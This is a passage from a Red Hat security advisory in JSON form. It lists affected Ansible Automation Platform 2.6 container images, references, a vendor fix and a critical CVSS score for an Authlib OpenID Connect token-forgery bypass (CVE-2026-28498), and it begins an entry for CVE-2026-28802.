"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28498"
},
{
"category": "external",
"summary": "RHBZ#2448182",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448182"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28498",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28498"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28498",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28498"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/b9bb2b25bf8b7e01512d847a95c1749646eaa72b",
"url": "https://github.com/authlib/authlib/commit/b9bb2b25bf8b7e01512d847a95c1749646eaa72b"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/releases/tag/v1.6.9",
"url": "https://github.com/authlib/authlib/releases/tag/v1.6.9"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-m344-f55w-2m6j",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-m344-f55w-2m6j"
}
],
"release_date": "2026-03-16T18:03:28.821000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-01T18:20:27+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6404"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "authlib: Authlib: Authentication bypass via forged OpenID Connect ID Tokens"
},
{
"cve": "CVE-2026-28802",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-03-06T07:01:49.366979+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
